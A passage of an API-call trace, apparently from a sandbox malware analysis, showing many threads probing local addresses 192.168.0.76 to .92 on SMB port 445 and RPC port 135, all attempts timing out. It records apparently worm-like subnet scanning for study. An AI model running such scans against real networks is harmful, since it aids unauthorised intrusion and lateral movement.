returned 0 [0096.599] connect (s=0xeb8, name=0x108aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.92"), namelen=16) returned -1 [0096.599] WSAGetLastError () returned 10035 [0096.599] select (in: nfds=0, readfds=0x0, writefds=0x108afd08, exceptfds=0x108afe10, timeout=0x108aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x108afd08, exceptfds=0x108afe10) returned 0 [0101.802] closesocket (s=0xeb8) returned 0 [0101.803] RtlExitUserThread (Status=0x0) Thread: id = 221 os_tid = 0xd60 [0091.566] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072b18 [0091.566] free (_Block=0x2072b18) [0091.566] inet_addr (cp="192.168.0.91") returned 0x5b00a8c0 [0091.566] htons (hostshort=0x1bd) returned 0xbd01 [0091.566] socket (af=2, type=1, protocol=6) returned 0xec4 [0091.567] ioctlsocket (in: s=0xec4, cmd=-2147195266, argp=0x109eff34 | out: argp=0x109eff34) returned 0 [0091.567] connect (s=0xec4, name=0x109eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.91"), namelen=16) returned -1 [0091.567] WSAGetLastError () returned 10035 [0091.567] select (in: nfds=0, readfds=0x0, writefds=0x109efd08, exceptfds=0x109efe10, timeout=0x109eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x109efd08, exceptfds=0x109efe10) returned 0 [0096.597] closesocket (s=0xec4) returned 0 [0096.597] inet_addr (cp="192.168.0.91") returned 0x5b00a8c0 [0096.597] htons (hostshort=0x87) returned 0x8700 [0096.597] socket (af=2, type=1, protocol=6) returned 0xec4 [0096.598] ioctlsocket (in: s=0xec4, cmd=-2147195266, argp=0x109eff34 | out: argp=0x109eff34) returned 0 [0096.598] connect (s=0xec4, name=0x109eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.91"), namelen=16) returned -1 [0096.598] WSAGetLastError () returned 10035 [0096.598] select (in: nfds=0, readfds=0x0, writefds=0x109efd08, exceptfds=0x109efe10, timeout=0x109eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x109efd08, exceptfds=0x109efe10) returned 0 [0101.800] closesocket (s=0xec4) returned 0 [0101.801] RtlExitUserThread (Status=0x0) Thread: id = 222 os_tid = 0xd64 [0091.568] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072af0 [0091.568] free (_Block=0x2072af0) [0091.568] inet_addr (cp="192.168.0.90") returned 0x5a00a8c0 [0091.568] htons (hostshort=0x1bd) returned 0xbd01 [0091.568] socket (af=2, type=1, protocol=6) returned 0xed0 [0091.568] ioctlsocket (in: s=0xed0, cmd=-2147195266, argp=0x10b2ff34 | out: argp=0x10b2ff34) returned 0 [0091.568] connect (s=0xed0, name=0x10b2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.90"), namelen=16) returned -1 [0091.569] WSAGetLastError () returned 10035 [0091.569] select (in: nfds=0, readfds=0x0, writefds=0x10b2fd08, exceptfds=0x10b2fe10, timeout=0x10b2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x10b2fd08, exceptfds=0x10b2fe10) returned 0 [0096.595] closesocket (s=0xed0) returned 0 [0096.596] inet_addr (cp="192.168.0.90") returned 0x5a00a8c0 [0096.596] htons (hostshort=0x87) returned 0x8700 [0096.596] socket (af=2, type=1, protocol=6) returned 0xed0 [0096.596] ioctlsocket (in: s=0xed0, cmd=-2147195266, argp=0x10b2ff34 | out: argp=0x10b2ff34) returned 0 [0096.596] connect (s=0xed0, name=0x10b2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.90"), namelen=16) returned -1 [0096.596] WSAGetLastError () returned 10035 [0096.597] select (in: nfds=0, readfds=0x0, writefds=0x10b2fd08, exceptfds=0x10b2fe10, timeout=0x10b2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x10b2fd08, exceptfds=0x10b2fe10) returned 0 [0101.799] closesocket (s=0xed0) returned 0 [0101.799] RtlExitUserThread (Status=0x0) Thread: id = 223 os_tid = 0xd68 [0091.569] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072ac8 [0091.569] free (_Block=0x2072ac8) [0091.569] inet_addr (cp="192.168.0.89") returned 0x5900a8c0 [0091.569] htons (hostshort=0x1bd) returned 0xbd01 [0091.569] socket (af=2, type=1, protocol=6) returned 0xedc [0091.571] ioctlsocket (in: s=0xedc, cmd=-2147195266, argp=0x10c6ff34 | out: argp=0x10c6ff34) returned 0 [0091.571] connect (s=0xedc, name=0x10c6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.89"), namelen=16) returned -1 [0091.572] WSAGetLastError () returned 10035 [0091.572] select (in: nfds=0, readfds=0x0, writefds=0x10c6fd08, exceptfds=0x10c6fe10, timeout=0x10c6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x10c6fd08, exceptfds=0x10c6fe10) returned 0 [0096.594] closesocket (s=0xedc) returned 0 [0096.595] inet_addr (cp="192.168.0.89") returned 0x5900a8c0 [0096.595] htons (hostshort=0x87) returned 0x8700 [0096.595] socket (af=2, type=1, protocol=6) returned 0xedc [0096.595] ioctlsocket (in: s=0xedc, cmd=-2147195266, argp=0x10c6ff34 | out: argp=0x10c6ff34) returned 0 [0096.595] connect (s=0xedc, name=0x10c6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.89"), namelen=16) returned -1 [0096.595] WSAGetLastError () returned 10035 [0096.595] select (in: nfds=0, readfds=0x0, writefds=0x10c6fd08, exceptfds=0x10c6fe10, timeout=0x10c6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x10c6fd08, exceptfds=0x10c6fe10) returned 0 [0101.797] closesocket (s=0xedc) returned 0 [0101.798] RtlExitUserThread (Status=0x0) Thread: id = 224 os_tid = 0xd6c [0091.574] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072aa0 [0091.574] free (_Block=0x2072aa0) [0091.574] inet_addr (cp="192.168.0.88") returned 0x5800a8c0 [0091.574] htons (hostshort=0x1bd) returned 0xbd01 [0091.574] socket (af=2, type=1, protocol=6) returned 0xee8 [0091.574] ioctlsocket (in: s=0xee8, cmd=-2147195266, argp=0x10daff34 | out: argp=0x10daff34) returned 0 [0091.574] connect (s=0xee8, name=0x10daff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.88"), namelen=16) returned -1 [0091.575] WSAGetLastError () returned 10035 [0091.575] select (in: nfds=0, readfds=0x0, writefds=0x10dafd08, exceptfds=0x10dafe10, timeout=0x10daff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x10dafd08, exceptfds=0x10dafe10) returned 0 [0096.593] closesocket (s=0xee8) returned 0 [0096.593] inet_addr (cp="192.168.0.88") returned 0x5800a8c0 [0096.593] htons (hostshort=0x87) returned 0x8700 [0096.593] socket (af=2, type=1, protocol=6) returned 0xee8 [0096.594] ioctlsocket (in: s=0xee8, cmd=-2147195266, argp=0x10daff34 | out: argp=0x10daff34) returned 0 [0096.594] connect (s=0xee8, name=0x10daff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.88"), namelen=16) returned -1 [0096.594] WSAGetLastError () returned 10035 [0096.594] select (in: nfds=0, readfds=0x0, writefds=0x10dafd08, exceptfds=0x10dafe10, timeout=0x10daff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x10dafd08, exceptfds=0x10dafe10) returned 0 [0101.780] closesocket (s=0xee8) returned 0 [0101.795] RtlExitUserThread (Status=0x0) Thread: id = 225 os_tid = 0xd70 [0091.575] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072a78 [0091.575] free (_Block=0x2072a78) [0091.575] inet_addr (cp="192.168.0.87") returned 0x5700a8c0 [0091.575] htons (hostshort=0x1bd) returned 0xbd01 [0091.575] socket (af=2, type=1, protocol=6) returned 0xef4 [0091.576] ioctlsocket (in: s=0xef4, cmd=-2147195266, argp=0x10eeff34 | out: argp=0x10eeff34) returned 0 [0091.576] connect (s=0xef4, name=0x10eeff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.87"), namelen=16) returned -1 [0091.577] WSAGetLastError () returned 10035 [0091.577] select (in: nfds=0, readfds=0x0, writefds=0x10eefd08, exceptfds=0x10eefe10, timeout=0x10eeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x10eefd08, exceptfds=0x10eefe10) returned 0 [0096.592] closesocket (s=0xef4) returned 0 [0096.592] inet_addr (cp="192.168.0.87") returned 0x5700a8c0 [0096.592] htons (hostshort=0x87) returned 0x8700 [0096.592] socket (af=2, type=1, protocol=6) returned 0xef4 [0096.593] ioctlsocket (in: s=0xef4, cmd=-2147195266, argp=0x10eeff34 | out: argp=0x10eeff34) returned 0 [0096.593] connect (s=0xef4, name=0x10eeff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.87"), namelen=16) returned -1 [0096.593] WSAGetLastError () returned 10035 [0096.593] select (in: nfds=0, readfds=0x0, writefds=0x10eefd08, exceptfds=0x10eefe10, timeout=0x10eeff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x10eefd08, exceptfds=0x10eefe10) returned 0 [0101.779] closesocket (s=0xef4) returned 0 [0101.779] RtlExitUserThread (Status=0x0) Thread: id = 226 os_tid = 0xd74 [0091.577] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072a50 [0091.577] free (_Block=0x2072a50) [0091.577] inet_addr (cp="192.168.0.86") returned 0x5600a8c0 [0091.577] htons (hostshort=0x1bd) returned 0xbd01 [0091.577] socket (af=2, type=1, protocol=6) returned 0xf00 [0091.578] ioctlsocket (in: s=0xf00, cmd=-2147195266, argp=0x1102ff34 | out: argp=0x1102ff34) returned 0 [0091.578] connect (s=0xf00, name=0x1102ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.86"), namelen=16) returned -1 [0091.579] WSAGetLastError () returned 10035 [0091.579] select (in: nfds=0, readfds=0x0, writefds=0x1102fd08, exceptfds=0x1102fe10, timeout=0x1102ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1102fd08, exceptfds=0x1102fe10) returned 0 [0096.601] closesocket (s=0xf00) returned 0 [0096.601] inet_addr (cp="192.168.0.86") returned 0x5600a8c0 [0096.601] htons (hostshort=0x87) returned 0x8700 [0096.601] socket (af=2, type=1, protocol=6) returned 0xf00 [0096.602] ioctlsocket (in: s=0xf00, cmd=-2147195266, argp=0x1102ff34 | out: argp=0x1102ff34) returned 0 [0096.602] connect (s=0xf00, name=0x1102ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.86"), namelen=16) returned -1 [0096.602] WSAGetLastError () returned 10035 [0096.602] select (in: nfds=0, readfds=0x0, writefds=0x1102fd08, exceptfds=0x1102fe10, timeout=0x1102ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1102fd08, exceptfds=0x1102fe10) returned 0 [0101.825] closesocket (s=0xf00) returned 0 [0101.826] RtlExitUserThread (Status=0x0) Thread: id = 227 os_tid = 0xd78 [0091.579] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072a28 [0091.579] free (_Block=0x2072a28) [0091.579] inet_addr (cp="192.168.0.85") returned 0x5500a8c0 [0091.579] htons (hostshort=0x1bd) returned 0xbd01 [0091.579] socket (af=2, type=1, protocol=6) returned 0xf0c [0091.579] ioctlsocket (in: s=0xf0c, cmd=-2147195266, argp=0x1116ff34 | out: argp=0x1116ff34) returned 0 [0091.579] connect (s=0xf0c, name=0x1116ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.85"), namelen=16) returned -1 [0091.580] WSAGetLastError () returned 10035 [0091.580] select (in: nfds=0, readfds=0x0, writefds=0x1116fd08, exceptfds=0x1116fe10, timeout=0x1116ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1116fd08, exceptfds=0x1116fe10) returned 0 [0096.602] closesocket (s=0xf0c) returned 0 [0096.603] inet_addr (cp="192.168.0.85") returned 0x5500a8c0 [0096.603] htons (hostshort=0x87) returned 0x8700 [0096.603] socket (af=2, type=1, protocol=6) returned 0xf0c [0096.603] ioctlsocket (in: s=0xf0c, cmd=-2147195266, argp=0x1116ff34 | out: argp=0x1116ff34) returned 0 [0096.603] connect (s=0xf0c, name=0x1116ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.85"), namelen=16) returned -1 [0096.603] WSAGetLastError () returned 10035 [0096.603] select (in: nfds=0, readfds=0x0, writefds=0x1116fd08, exceptfds=0x1116fe10, timeout=0x1116ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1116fd08, exceptfds=0x1116fe10) returned 0 [0101.823] closesocket (s=0xf0c) returned 0 [0101.824] RtlExitUserThread (Status=0x0) Thread: id = 228 os_tid = 0xd7c [0091.580] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072a00 [0091.581] free (_Block=0x2072a00) [0091.581] inet_addr (cp="192.168.0.84") returned 0x5400a8c0 [0091.581] htons (hostshort=0x1bd) returned 0xbd01 [0091.581] socket (af=2, type=1, protocol=6) returned 0xf18 [0091.581] ioctlsocket (in: s=0xf18, cmd=-2147195266, argp=0x112aff34 | out: argp=0x112aff34) returned 0 [0091.581] connect (s=0xf18, name=0x112aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.84"), namelen=16) returned -1 [0091.582] WSAGetLastError () returned 10035 [0091.582] select (in: nfds=0, readfds=0x0, writefds=0x112afd08, exceptfds=0x112afe10, timeout=0x112aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x112afd08, exceptfds=0x112afe10) returned 0 [0096.603] closesocket (s=0xf18) returned 0 [0096.604] inet_addr (cp="192.168.0.84") returned 0x5400a8c0 [0096.604] htons (hostshort=0x87) returned 0x8700 [0096.604] socket (af=2, type=1, protocol=6) returned 0xf18 [0096.604] ioctlsocket (in: s=0xf18, cmd=-2147195266, argp=0x112aff34 | out: argp=0x112aff34) returned 0 [0096.604] connect (s=0xf18, name=0x112aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.84"), namelen=16) returned -1 [0096.605] WSAGetLastError () returned 10035 [0096.605] select (in: nfds=0, readfds=0x0, writefds=0x112afd08, exceptfds=0x112afe10, timeout=0x112aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x112afd08, exceptfds=0x112afe10) returned 0 [0101.821] closesocket (s=0xf18) returned 0 [0101.822] RtlExitUserThread (Status=0x0) Thread: id = 229 os_tid = 0xd80 [0091.582] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20729d8 [0091.582] free (_Block=0x20729d8) [0091.582] inet_addr (cp="192.168.0.83") returned 0x5300a8c0 [0091.582] htons (hostshort=0x1bd) returned 0xbd01 [0091.582] socket (af=2, type=1, protocol=6) returned 0xf24 [0091.582] ioctlsocket (in: s=0xf24, cmd=-2147195266, argp=0x113eff34 | out: argp=0x113eff34) returned 0 [0091.582] connect (s=0xf24, name=0x113eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.83"), namelen=16) returned -1 [0091.583] WSAGetLastError () returned 10035 [0091.583] select (in: nfds=0, readfds=0x0, writefds=0x113efd08, exceptfds=0x113efe10, timeout=0x113eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x113efd08, exceptfds=0x113efe10) returned 0 [0096.605] closesocket (s=0xf24) returned 0 [0096.605] inet_addr (cp="192.168.0.83") returned 0x5300a8c0 [0096.605] htons (hostshort=0x87) returned 0x8700 [0096.605] socket (af=2, type=1, protocol=6) returned 0xf24 [0096.606] ioctlsocket (in: s=0xf24, cmd=-2147195266, argp=0x113eff34 | out: argp=0x113eff34) returned 0 [0096.606] connect (s=0xf24, name=0x113eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.83"), namelen=16) returned -1 [0096.606] WSAGetLastError () returned 10035 [0096.606] select (in: nfds=0, readfds=0x0, writefds=0x113efd08, exceptfds=0x113efe10, timeout=0x113eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x113efd08, exceptfds=0x113efe10) returned 0 [0101.819] closesocket (s=0xf24) returned 0 [0101.820] RtlExitUserThread (Status=0x0) Thread: id = 230 os_tid = 0xd84 [0091.583] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20729b0 [0091.584] free (_Block=0x20729b0) [0091.584] inet_addr (cp="192.168.0.82") returned 0x5200a8c0 [0091.584] htons (hostshort=0x1bd) returned 0xbd01 [0091.584] socket (af=2, type=1, protocol=6) returned 0xf30 [0091.584] ioctlsocket (in: s=0xf30, cmd=-2147195266, argp=0x1152ff34 | out: argp=0x1152ff34) returned 0 [0091.584] connect (s=0xf30, name=0x1152ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.82"), namelen=16) returned -1 [0091.585] WSAGetLastError () returned 10035 [0091.585] select (in: nfds=0, readfds=0x0, writefds=0x1152fd08, exceptfds=0x1152fe10, timeout=0x1152ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1152fd08, exceptfds=0x1152fe10) returned 0 [0096.606] closesocket (s=0xf30) returned 0 [0096.606] inet_addr (cp="192.168.0.82") returned 0x5200a8c0 [0096.607] htons (hostshort=0x87) returned 0x8700 [0096.607] socket (af=2, type=1, protocol=6) returned 0xf30 [0096.607] ioctlsocket (in: s=0xf30, cmd=-2147195266, argp=0x1152ff34 | out: argp=0x1152ff34) returned 0 [0096.607] connect (s=0xf30, name=0x1152ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.82"), namelen=16) returned -1 [0096.607] WSAGetLastError () returned 10035 [0096.607] select (in: nfds=0, readfds=0x0, writefds=0x1152fd08, exceptfds=0x1152fe10, timeout=0x1152ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1152fd08, exceptfds=0x1152fe10) returned 0 [0101.818] closesocket (s=0xf30) returned 0 [0101.819] RtlExitUserThread (Status=0x0) Thread: id = 231 os_tid = 0xd88 [0091.585] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072988 [0091.585] free (_Block=0x2072988) [0091.585] inet_addr (cp="192.168.0.81") returned 0x5100a8c0 [0091.585] htons (hostshort=0x1bd) returned 0xbd01 [0091.585] socket (af=2, type=1, protocol=6) returned 0xf3c [0091.586] ioctlsocket (in: s=0xf3c, cmd=-2147195266, argp=0x1166ff34 | out: argp=0x1166ff34) returned 0 [0091.586] connect (s=0xf3c, name=0x1166ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.81"), namelen=16) returned -1 [0091.586] WSAGetLastError () returned 10035 [0091.586] select (in: nfds=0, readfds=0x0, writefds=0x1166fd08, exceptfds=0x1166fe10, timeout=0x1166ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1166fd08, exceptfds=0x1166fe10) returned 0 [0096.607] closesocket (s=0xf3c) returned 0 [0096.608] inet_addr (cp="192.168.0.81") returned 0x5100a8c0 [0096.608] htons (hostshort=0x87) returned 0x8700 [0096.608] socket (af=2, type=1, protocol=6) returned 0xf3c [0096.608] ioctlsocket (in: s=0xf3c, cmd=-2147195266, argp=0x1166ff34 | out: argp=0x1166ff34) returned 0 [0096.608] connect (s=0xf3c, name=0x1166ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.81"), namelen=16) returned -1 [0096.608] WSAGetLastError () returned 10035 [0096.608] select (in: nfds=0, readfds=0x0, writefds=0x1166fd08, exceptfds=0x1166fe10, timeout=0x1166ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x1166fd08, exceptfds=0x1166fe10) returned 0 [0101.816] closesocket (s=0xf3c) returned 0 [0101.817] RtlExitUserThread (Status=0x0) Thread: id = 232 os_tid = 0xd8c [0091.587] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072960 [0091.587] free (_Block=0x2072960) [0091.587] inet_addr (cp="192.168.0.80") returned 0x5000a8c0 [0091.587] htons (hostshort=0x1bd) returned 0xbd01 [0091.587] socket (af=2, type=1, protocol=6) returned 0xf48 [0091.587] ioctlsocket (in: s=0xf48, cmd=-2147195266, argp=0x117aff34 | out: argp=0x117aff34) returned 0 [0091.587] connect (s=0xf48, name=0x117aff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.80"), namelen=16) returned -1 [0091.588] WSAGetLastError () returned 10035 [0091.588] select (in: nfds=0, readfds=0x0, writefds=0x117afd08, exceptfds=0x117afe10, timeout=0x117aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x117afd08, exceptfds=0x117afe10) returned 0 [0096.608] closesocket (s=0xf48) returned 0 [0096.609] inet_addr (cp="192.168.0.80") returned 0x5000a8c0 [0096.609] htons (hostshort=0x87) returned 0x8700 [0096.609] socket (af=2, type=1, protocol=6) returned 0xf48 [0096.609] ioctlsocket (in: s=0xf48, cmd=-2147195266, argp=0x117aff34 | out: argp=0x117aff34) returned 0 [0096.609] connect (s=0xf48, name=0x117aff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.80"), namelen=16) returned -1 [0096.609] WSAGetLastError () returned 10035 [0096.609] select (in: nfds=0, readfds=0x0, writefds=0x117afd08, exceptfds=0x117afe10, timeout=0x117aff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x117afd08, exceptfds=0x117afe10) returned 0 [0101.814] closesocket (s=0xf48) returned 0 [0101.815] RtlExitUserThread (Status=0x0) Thread: id = 233 os_tid = 0xd90 [0091.591] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072938 [0091.591] free (_Block=0x2072938) [0091.591] inet_addr (cp="192.168.0.79") returned 0x4f00a8c0 [0091.591] htons (hostshort=0x1bd) returned 0xbd01 [0091.591] socket (af=2, type=1, protocol=6) returned 0xf54 [0091.591] ioctlsocket (in: s=0xf54, cmd=-2147195266, argp=0x118eff34 | out: argp=0x118eff34) returned 0 [0091.591] connect (s=0xf54, name=0x118eff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.79"), namelen=16) returned -1 [0091.592] WSAGetLastError () returned 10035 [0091.592] select (in: nfds=0, readfds=0x0, writefds=0x118efd08, exceptfds=0x118efe10, timeout=0x118eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x118efd08, exceptfds=0x118efe10) returned 0 [0096.610] closesocket (s=0xf54) returned 0 [0096.610] inet_addr (cp="192.168.0.79") returned 0x4f00a8c0 [0096.610] htons (hostshort=0x87) returned 0x8700 [0096.610] socket (af=2, type=1, protocol=6) returned 0xf54 [0096.610] ioctlsocket (in: s=0xf54, cmd=-2147195266, argp=0x118eff34 | out: argp=0x118eff34) returned 0 [0096.610] connect (s=0xf54, name=0x118eff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.79"), namelen=16) returned -1 [0096.611] WSAGetLastError () returned 10035 [0096.611] select (in: nfds=0, readfds=0x0, writefds=0x118efd08, exceptfds=0x118efe10, timeout=0x118eff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x118efd08, exceptfds=0x118efe10) returned 0 [0101.812] closesocket (s=0xf54) returned 0 [0101.813] RtlExitUserThread (Status=0x0) Thread: id = 234 os_tid = 0xd94 [0091.592] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072910 [0091.592] free (_Block=0x2072910) [0091.593] inet_addr (cp="192.168.0.78") returned 0x4e00a8c0 [0091.593] htons (hostshort=0x1bd) returned 0xbd01 [0091.593] socket (af=2, type=1, protocol=6) returned 0xf60 [0091.593] ioctlsocket (in: s=0xf60, cmd=-2147195266, argp=0x11a2ff34 | out: argp=0x11a2ff34) returned 0 [0091.593] connect (s=0xf60, name=0x11a2ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.78"), namelen=16) returned -1 [0091.594] WSAGetLastError () returned 10035 [0091.594] select (in: nfds=0, readfds=0x0, writefds=0x11a2fd08, exceptfds=0x11a2fe10, timeout=0x11a2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11a2fd08, exceptfds=0x11a2fe10) returned 0 [0096.615] closesocket (s=0xf60) returned 0 [0096.615] inet_addr (cp="192.168.0.78") returned 0x4e00a8c0 [0096.615] htons (hostshort=0x87) returned 0x8700 [0096.615] socket (af=2, type=1, protocol=6) returned 0xf60 [0096.615] ioctlsocket (in: s=0xf60, cmd=-2147195266, argp=0x11a2ff34 | out: argp=0x11a2ff34) returned 0 [0096.615] connect (s=0xf60, name=0x11a2ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.78"), namelen=16) returned -1 [0096.616] WSAGetLastError () returned 10035 [0096.616] select (in: nfds=0, readfds=0x0, writefds=0x11a2fd08, exceptfds=0x11a2fe10, timeout=0x11a2ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11a2fd08, exceptfds=0x11a2fe10) returned 0 [0101.806] closesocket (s=0xf60) returned 0 [0101.806] RtlExitUserThread (Status=0x0) Thread: id = 235 os_tid = 0xd98 [0091.594] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20728e8 [0091.594] free (_Block=0x20728e8) [0091.594] inet_addr (cp="192.168.0.77") returned 0x4d00a8c0 [0091.594] htons (hostshort=0x1bd) returned 0xbd01 [0091.594] socket (af=2, type=1, protocol=6) returned 0xf6c [0091.595] ioctlsocket (in: s=0xf6c, cmd=-2147195266, argp=0x11b6ff34 | out: argp=0x11b6ff34) returned 0 [0091.595] connect (s=0xf6c, name=0x11b6ff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.77"), namelen=16) returned -1 [0091.595] WSAGetLastError () returned 10035 [0091.595] select (in: nfds=0, readfds=0x0, writefds=0x11b6fd08, exceptfds=0x11b6fe10, timeout=0x11b6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11b6fd08, exceptfds=0x11b6fe10) returned 0 [0096.613] closesocket (s=0xf6c) returned 0 [0096.614] inet_addr (cp="192.168.0.77") returned 0x4d00a8c0 [0096.614] htons (hostshort=0x87) returned 0x8700 [0096.614] socket (af=2, type=1, protocol=6) returned 0xf6c [0096.614] ioctlsocket (in: s=0xf6c, cmd=-2147195266, argp=0x11b6ff34 | out: argp=0x11b6ff34) returned 0 [0096.614] connect (s=0xf6c, name=0x11b6ff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.77"), namelen=16) returned -1 [0096.614] WSAGetLastError () returned 10035 [0096.614] select (in: nfds=0, readfds=0x0, writefds=0x11b6fd08, exceptfds=0x11b6fe10, timeout=0x11b6ff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11b6fd08, exceptfds=0x11b6fe10) returned 0 [0101.807] closesocket (s=0xf6c) returned 0 [0101.808] RtlExitUserThread (Status=0x0) Thread: id = 236 os_tid = 0xd9c [0091.598] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x20728c0 [0091.598] free (_Block=0x20728c0) [0091.598] inet_addr (cp="192.168.0.76") returned 0x4c00a8c0 [0091.598] htons (hostshort=0x1bd) returned 0xbd01 [0091.598] socket (af=2, type=1, protocol=6) returned 0xf78 [0091.598] ioctlsocket (in: s=0xf78, cmd=-2147195266, argp=0x11caff34 | out: argp=0x11caff34) returned 0 [0091.598] connect (s=0xf78, name=0x11caff1c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.76"), namelen=16) returned -1 [0091.599] WSAGetLastError () returned 10035 [0091.599] select (in: nfds=0, readfds=0x0, writefds=0x11cafd08, exceptfds=0x11cafe10, timeout=0x11caff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11cafd08, exceptfds=0x11cafe10) returned 0 [0096.612] closesocket (s=0xf78) returned 0 [0096.612] inet_addr (cp="192.168.0.76") returned 0x4c00a8c0 [0096.613] htons (hostshort=0x87) returned 0x8700 [0096.613] socket (af=2, type=1, protocol=6) returned 0xf78 [0096.613] ioctlsocket (in: s=0xf78, cmd=-2147195266, argp=0x11caff34 | out: argp=0x11caff34) returned 0 [0096.613] connect (s=0xf78, name=0x11caff1c*(sa_family=2, sin_port=0x87, sin_addr="192.168.0.76"), namelen=16) returned -1 [0096.613] WSAGetLastError () returned 10035 [0096.613] select (in: nfds=0, readfds=0x0, writefds=0x11cafd08, exceptfds=0x11cafe10, timeout=0x11caff2c*(tv_sec=5, tv_usec=0) | out: readfds=0x0, writefds=0x11cafd08, exceptfds=0x11cafe10) returned 0 [0101.809] closesocket (s=0xf78) returned 0 [0101.810] RtlExitUserThread (Status=0x0) Thread: id = 237 os_tid = 0xda0 [0091.603] RtlInterlockedPopEntrySList (in: ListHead=0x1fa03e8 | out: ListHead=0x1fa03e8) returned 0x2072898 [0091.603] free (_Block=0x2072898) [0091.603] inet_addr 